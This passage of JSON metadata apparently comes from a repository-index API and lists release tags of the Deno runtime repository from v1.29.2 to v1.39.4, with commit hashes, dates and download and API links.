/github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependenci